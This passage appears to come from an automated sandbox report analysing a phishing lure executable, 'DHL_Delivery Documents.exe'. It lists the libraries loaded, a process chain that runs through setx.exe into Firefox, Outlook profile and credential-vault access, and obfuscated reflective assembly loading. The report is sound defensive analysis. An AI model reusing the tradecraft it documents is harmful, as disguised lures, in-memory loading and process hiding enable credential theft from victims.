            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exeProcess created: C:\Windows\SysWOW64\setx.exe "C:\Windows\SysWOW64\setx.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\setx.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: slc.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: amsi.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: userenv.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: windowscodecs.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: propsys.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: edputil.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: netutils.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: appresolver.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: bcp47langs.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: slc.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: sppc.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\setx.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\setx.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\setx.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\setx.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\setx.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\setx.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\setx.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\setx.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\setx.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\setx.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\setx.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\setx.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\setx.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\setx.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\setx.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\setx.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\setx.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\setx.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\setx.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\setx.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\setx.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\setx.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\setx.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\setx.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: DHL_Delivery Documents.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: DHL_Delivery Documents.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: DHL_Delivery Documents.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3278494163.000000000060E000.00000002.00000001.01000000.0000000A.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3278640060.000000000060E000.00000002.00000001.01000000.0000000A.sdmp
            Source: Binary string: wntdll.pdbUGP source: DHL_Delivery Documents.exe, 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, setx.exe, 00000012.00000003.2632462016.0000000002882000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, setx.exe, 00000012.00000003.2634170956.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: DHL_Delivery Documents.exe, DHL_Delivery Documents.exe, 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, setx.exe, setx.exe, 00000012.00000003.2632462016.0000000002882000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, setx.exe, 00000012.00000003.2634170956.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: setx.pdbGCTL source: DHL_Delivery Documents.exe, 00000008.00000002.2632980952.0000000001788000.00000004.00000020.00020000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3279344083.0000000001228000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: setx.pdb source: DHL_Delivery Documents.exe, 00000008.00000002.2632980952.0000000001788000.00000004.00000020.00020000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3279344083.0000000001228000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: JeWB.pdbSHA256 source: DHL_Delivery Documents.exe, YybGLWQSx.exe.0.dr
            Source: Binary string: JeWB.pdb source: DHL_Delivery Documents.exe, YybGLWQSx.exe.0.dr

            Data Obfuscation

            Source: DHL_Delivery Documents.exe, BufferingPage.cs | .Net Code: InitializeComponent
            Source: YybGLWQSx.exe.0.dr, BufferingPage.cs | .Net Code: InitializeComponent
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, RU6c2kU9YKG76GBYRe.cs | .Net Code: PHLl19SWnJ System.Reflection.Assembly.Load(byte[])
            Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, RU6c2kU9YKG76GBYRe.cs | .Net Code: PHLl19SWnJ System.Reflection.Assembly.Load(byte[])
            Source: 0.2.DHL_Delivery Documents.exe.5350000.3.raw.unpack, LoginForm.cs | .Net Code: _206B_206C_202A_202D_206F_206F_206C_202D_206A_202A_200B_206C_206E_206A_206D_206B_202C_206E_200C_206F_200D_206D_200C_200F_202C_206C_202E_206B_202B_202E_206E_206B_206B_206D_206C_202C_200D_202E_202C_200E_202E System.Reflection.Assembly.Load(byte[])
            Source: 18.2.setx.exe.320cd08.2.raw.unpack, BufferingPage.cs | .Net Code: InitializeComponent
            Source: 19.0.OoIHIwIlaOHZFTFWeSHYCjEJ.exe.280cd08.1.raw.unpack, BufferingPage.cs | .Net Code: InitializeComponent
            Source: 19.2.OoIHIwIlaOHZFTFWeSHYCjEJ.exe.280cd08.1.raw.unpack, BufferingPage.cs | .Net Code: InitializeComponent
            Source: DHL_Delivery Documents.exe | Static PE information: 0xDBE1BAC7 [Sun Nov 24 19:15:19 2086 UTC]
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 0_2_02C147B1 push ebp; ret 0_2_02C14815
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_0041483F push ds; iretd 8_2_00414840
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_00405256 push cs; retf 8_2_0040525E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_00418BCE push ds; iretd 8_2_00418BCF
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_004063BD push edi; ret 8_2_004063BE
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_00404CD3 push dword ptr [edx+08391132h]; iretd 8_2_00404D17
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_004124FD push eax; ret 8_2_004124FE
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_00403490 push eax; ret 8_2_00403492
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_00404D01 push dword ptr [edx+08391132h]; iretd 8_2_00404D17
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_0041CDFC pushad ; ret 8_2_0041CDF6
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_0041CDBE pushad ; ret 8_2_0041CDF6
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_0040CFCC push esp; ret 8_2_0040CFCD
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01BE225F pushad ; ret 8_2_01BE27F9
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01BE27FA pushad ; ret 8_2_01BE27F9
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C109AD push ecx; mov dword ptr [esp], ecx 8_2_01C109B6
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01BE283D push eax; iretd 8_2_01BE2858
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01BE1368 push eax; iretd 8_2_01BE1369
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Code function: 9_2_04A1F438 push eax; iretd 9_2_04A1F439
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Code function: 13_2_0162C54F push 8B015B67h; ret 13_2_0162C554
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Code function: 13_2_0162C54D pushfd ; ret 13_2_0162C54E
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Code function: 13_2_0162C9D7 push edi; ret 13_2_0162C9D9
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Code function: 13_2_015E09AD push ecx; mov dword ptr [esp], ecx 13_2_015E09B6
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Code function: 13_2_015B1FEC push eax; iretd 13_2_015B1FED
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Code function: 13_2_01637E99 push ecx; ret 13_2_01637EAC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | Code function: 17_2_02FDEA8F push ds; iretd 17_2_02FDEA90
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | Code function: 17_2_02FE924D push DCA6106Ah; iretd 17_2_02FE9254
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | Code function: 17_2_02FD721C push esp; ret 17_2_02FD721D
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | Code function: 17_2_02FE2A11 push ds; ret 17_2_02FE2A12
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | Code function: 17_2_02FE704C pushad ; ret 17_2_02FE7046
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | Code function: 17_2_02FE700E pushad ; ret 17_2_02FE7046
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | Code function: 17_2_02FE2E1E push ds; iretd 17_2_02FE2E1F
            Source: DHL_Delivery Documents.exeStatic PE information: section name: .text entropy: 7.036454178640072
            Source: YybGLWQSx.exe.0.drStatic PE information: section name: .text entropy: 7.036454178640072
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, AbRlcZD5I4DdphA7Ht.csHigh entropy of concatenated method names: 'BT3xmq3GYn', 'sKHxTgGoLu', 'olfxwB7MpT', 'IiGxe6r2jE', 'Lw5xr6bNpq', 'Ml9xBBiKpK', 'NlGx7CtvYM', 'bnmxnnpSCg', 'nkwxE291MO', 'oSbxaW2IWV'
            Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, SJ926WTpoKiyGmVNYm.csHigh entropy of concatenated method names: 'kD9NM3WXem', 'iiDNbAsWSW', 'ICgNm0klnE', 'qiGNTfEBuT', 'vxUNdFrUba', 'TDKNHVhTSk', 'GeTNCra2Sa', 'nnQNGeb0rM', 'jFYNPKp5CX', 'V1pNcks5FO'
